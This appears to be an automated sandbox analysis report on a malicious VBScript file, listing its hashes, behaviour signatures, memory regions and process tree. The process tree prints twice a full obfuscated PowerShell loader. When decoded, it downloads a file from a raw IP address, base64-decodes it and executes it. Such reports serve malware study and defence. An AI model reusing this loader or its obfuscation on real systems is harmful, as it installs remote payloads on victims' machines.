Overview

overview

7

Static

static

1

guh.vbs

windows7-x64

1

guh.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    36s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    15-03-2023 09:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    guh.vbs

  • Size

    31KB

  • MD5

    fc718ca491cf06c3a37b16e6b7dd25f4

  • SHA1

    e1eb04381a31a14fc33a5930a0a668fbf887fee8

  • SHA256

    75145be95746fcb54ef093b665cc7dcfb1cdfc7e6455dd271b1326b1543bbe16

  • SHA512

    3f02a6cb0befa3a66693471e82bb2aea295545f5ab1719e3bb6c6c66882adedef590dd128f8cb47fb959e3bfe14c70822bbd6211059c5599e97723cc0d930148

  • SSDEEP

    768:k2s3BQhBVu25YpiqOcGpBA5FXe21oomQdDPgl3nn4kSrbuDtST/aNtMdlrJu6nbX:6OLuu21oomQdcl3n4ke68rjem

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\guh.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Bjergland9 ([String]$Marekanit){For($eventy=1; $eventy -lt $Marekanit.Length-1; $eventy+=(1+1)){$Drmmety=$Drmmety+$Marekanit.Substring($eventy, 1)};$Drmmety;}$Pensterger=Bjergland9 'Sh tatGp : / /O9p1B.O2 4 4R.S1K9I7 . 9R/ tPrCu mDpS/pFSo rEbFl 1O5 3D.BpUr xG ';$Drmmety01=Bjergland9 'MiUeSx ';$Indst = Bjergland9 'S\ sPySssw o wP6 4 \ WTi nSd o wFsOPSoSwVeBrASth eUl l \ vG1C.P0T\TpBo wOe r sDhPeOl lR. e x e ';.($Drmmety01) (Bjergland9 ' $PI d r t 2 = $Se nKv :swPiPnudUiNr ') ;.($Drmmety01) (Bjergland9 'F$cI n d sUtC=A$gI dTr tP2F+U$PI nRdPs tD ') ;.($Drmmety01) (Bjergland9 ' $sUSn dOo =d ( (SgFw msiF waiNnB3 2B_Wp rsoPcBedsSs -EF APWrFoRcMe s sFIUdA= $ { P IHDG}R) .LCOo mBm aHn d LSiDn eM)A D- sTp l i t [ c h aMrH] 3F4 ');.($Drmmety01) (Bjergland9 'I$SBSibbOlBiFoD = j$GU nNdFo [G$AUAn d oG. cOo u n tD-F2S]B ');.($Drmmety01) (Bjergland9 ' $SP uRrBp = ( TSeTsPtT-TP a t hI $GI nKd s t )L U- ASnwd ( [sIAn tHPBt rK] :G: sHiUzAeT L-KeGqS 8S)S ') ;if ($Purp) {.$Indst $Biblio;} else {;$Drmmety00=Bjergland9 'SSNtSaOrCtC- B i tTs T rVa n sufPeAr T- S oRubr cKeF $ P eUnPsSt eSr g e r G- D e s tTiUnya t iUo n C$ I dMr tC2K ';.($Drmmety01) (Bjergland9 ' $ ISdArVt 2N=V$ e n vL: aAp pFdsaCtSa ') ;.($Drmmety01) (Bjergland9 'MIDmOpToFrStU- MSoFd u l eE FB i t s T rBaOn sRfte rO ') ;$Idrt2=$Idrt2+'\Folk.Pol';while (-not $Noto) {.($Drmmety01) (Bjergland9 ' $IN oCtMo = (STVeVs tV-BP a tBhU $DIAd rPt 2L) ') ;.($Drmmety01) $Drmmety00;.($Drmmety01) (Bjergland9 'cSLt a rVtK-ISAlKeBeMpP G5P ');}.($Drmmety01) (Bjergland9 'B$IBLjse r gSl aFnRdG F=O sGBeCtP-MC o n t eTnUtA f$UI dKrRt 2S ');.($Drmmety01) (Bjergland9 'O$ADGiPs iBnAf lBa = T[HS ySsPtLe mC.ICSo n vFe rStW] : :SF r oSmIBSa s e 6F4oSSt rKiSnRgS(T$ BVj eDrkg lHaMn d )D ');.($Drmmety01) (Bjergland9 'R$GD rCmsmHePtGy 2 I=h [HS yBsttPe mU. T e xWtC.OESnFcPoWdPi n gC] :O:PABSKCDI IK.JG eTtOS tDrai npgC(S$ DTiPsSiVn fSlIa )F ');.($Drmmety01) (Bjergland9 ' $DD rUaSw b = $ DPrFm mVeAtUyl2V.Bs uNbWs t r iSnMgE( 1D8K3R5 1R1 ,A1 9 9B5g8I)R ');.($Drmmety01) $Drawb;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Bjergland9 ([String]$Marekanit){For($eventy=1; $eventy -lt $Marekanit.Length-1; $eventy+=(1+1)){$Drmmety=$Drmmety+$Marekanit.Substring($eventy, 1)};$Drmmety;}$Pensterger=Bjergland9 'Sh tatGp : / /O9p1B.O2 4 4R.S1K9I7 . 9R/ tPrCu mDpS/pFSo rEbFl 1O5 3D.BpUr xG ';$Drmmety01=Bjergland9 'MiUeSx ';$Indst = Bjergland9 'S\ sPySssw o wP6 4 \ WTi nSd o wFsOPSoSwVeBrASth eUl l \ vG1C.P0T\TpBo wOe r sDhPeOl lR. e x e ';.($Drmmety01) (Bjergland9 ' $PI d r t 2 = $Se nKv :swPiPnudUiNr ') ;.($Drmmety01) (Bjergland9 'F$cI n d sUtC=A$gI dTr tP2F+U$PI nRdPs tD ') ;.($Drmmety01) (Bjergland9 ' $sUSn dOo =d ( (SgFw msiF waiNnB3 2B_Wp rsoPcBedsSs -EF APWrFoRcMe s sFIUdA= $ { P IHDG}R) .LCOo mBm aHn d LSiDn eM)A D- sTp l i t [ c h aMrH] 3F4 ');.($Drmmety01) (Bjergland9 'I$SBSibbOlBiFoD = j$GU nNdFo [G$AUAn d oG. cOo u n tD-F2S]B ');.($Drmmety01) (Bjergland9 ' $SP uRrBp = ( TSeTsPtT-TP a t hI $GI nKd s t )L U- ASnwd ( [sIAn tHPBt rK] :G: sHiUzAeT L-KeGqS 8S)S ') ;if ($Purp) {.$Indst $Biblio;} else {;$Drmmety00=Bjergland9 'SSNtSaOrCtC- B i tTs T rVa n sufPeAr T- S oRubr cKeF $ P eUnPsSt eSr g e r G- D e s tTiUnya t iUo n C$ I dMr tC2K ';.($Drmmety01) (Bjergland9 ' $ ISdArVt 2N=V$ e n vL: aAp pFdsaCtSa ') ;.($Drmmety01) (Bjergland9 'MIDmOpToFrStU- MSoFd u l eE FB i t s T rBaOn sRfte rO ') ;$Idrt2=$Idrt2+'\Folk.Pol';while (-not $Noto) {.($Drmmety01) (Bjergland9 ' $IN oCtMo = (STVeVs tV-BP a tBhU $DIAd rPt 2L) ') ;.($Drmmety01) $Drmmety00;.($Drmmety01) (Bjergland9 'cSLt a rVtK-ISAlKeBeMpP G5P ');}.($Drmmety01) (Bjergland9 'B$IBLjse r gSl aFnRdG F=O sGBeCtP-MC o n t eTnUtA f$UI dKrRt 2S ');.($Drmmety01) (Bjergland9 'O$ADGiPs iBnAf lBa = T[HS ySsPtLe mC.ICSo n vFe rStW] : :SF r oSmIBSa s e 6F4oSSt rKiSnRgS(T$ BVj eDrkg lHaMn d )D ');.($Drmmety01) (Bjergland9 'R$GD rCmsmHePtGy 2 I=h [HS yBsttPe mU. T e xWtC.OESnFcPoWdPi n gC] :O:PABSKCDI IK.JG eTtOS tDrai npgC(S$ DTiPsSiVn fSlIa )F ');.($Drmmety01) (Bjergland9 ' $DD rUaSw b = $ DPrFm mVeAtUyl2V.Bs uNbWs t r iSnMgE( 1D8K3R5 1R1 ,A1 9 9B5g8I)R ');.($Drmmety01) $Drawb;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:432

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MJSY3VJFHTT16CO946YX.temp
    Filesize

    7KB

    MD5

    fe58bd0827614f79f8aaa8d9aea44bfc

    SHA1

    3e951442d3c2c2549e6128c818d16616090826d2

    SHA256

    63a14fa5afb5f09d912fc071b331f3d7e30ffdbc456b7eefa91d681230105405

    SHA512

    85a48fcc00e1200e42020344582bb7855b19c96194a28639ac9a9903e31c7f34fe0280c6defe056340d8b858ff0383b2f89d83eac163cf7cf4654f39c6498b0b

    Download Submit

  • memory/432-66-0x0000000002660000-0x00000000026A0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/432-83-0x0000000005250000-0x0000000005251000-memory.dmp

    Filesize

    4KB

    Download

  • memory/432-82-0x00000000061C0000-0x000000000881A000-memory.dmp

    Filesize

    38.4MB

    Download

  • memory/432-81-0x0000000002660000-0x00000000026A0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/432-67-0x0000000002660000-0x00000000026A0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1528-62-0x0000000002790000-0x0000000002810000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1528-65-0x0000000002790000-0x0000000002810000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1528-58-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1528-77-0x0000000002790000-0x0000000002810000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1528-78-0x0000000002790000-0x0000000002810000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1528-79-0x0000000002790000-0x0000000002810000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1528-80-0x0000000002790000-0x0000000002810000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1528-61-0x0000000002790000-0x0000000002810000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1528-60-0x0000000002790000-0x0000000002810000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1528-59-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

    Download